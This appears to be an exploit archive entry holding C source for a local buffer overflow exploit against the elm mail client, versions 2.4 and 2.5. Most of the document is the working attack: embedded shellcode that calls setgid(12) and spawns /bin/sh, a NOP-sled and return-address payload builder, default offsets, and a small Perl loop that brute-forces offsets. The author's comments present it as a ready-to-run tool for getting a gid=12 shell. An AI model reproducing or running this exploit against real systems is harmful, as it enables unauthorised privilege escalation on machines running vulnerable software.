One last elm v2.4 / v2.5 exploit - gives EGID 12. This version works against almost all vulnerable versions of elm.
47fefa5230db61d38f353f0a5b82b73f911a8e966cb50c54a8092a788c5e4d9e
/* (linux)elm[2.4/2.5(last time)] buffer overflow, by v9[v9@fakehalo.org].
this will give you a gid=12 shell if /usr/bin/elm is SGID(=2755). this is
the last exploit i will make for elm, i swear... at least until the next
version of elm. :) [the third and last installment of my elm bof trilogy. :)]
i doubt anyone will(should) use elm after all of the holes that i and
others have found. i liked this one because the buffersize is the same on
both elm 2.4(PL25) and elm 2.5(PL3). so, just run through the offsets.
note: just one more character and it would have overflowed in strcpy(esi),
making it a pain in the ass. but i had an exact four character margin to
work with at 260 characters(+4), i couldn't of asked for anything more
perfect. :) (eip)
offsets(roughly) used on my box(slack3.6), another slackware box and a
redhat box. -300--500 worked on both 2.4/2.5, so it's default:
2.4(PL25): -300--500, 1000-1200.
2.5(PL3): -300--500, 1400-1600, 3400.
here is a quick perl script to run offsets (until ctrl-c):
#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./elm_last $i");
$i++; # or $i+=100; if you want to be speedy. (which you do, again)
} */
#define DEFAULT_OFFSET -400
static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[264];
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
printf("return address: 0x%lx, offset: %d.\nif this is elm2.4 you will need to run \"reset\" to reset your terminal.\n",ret,offset);
for(i=0;i<264;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(260-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
execlp("/usr/bin/elm","elm","-f",bof,0);
}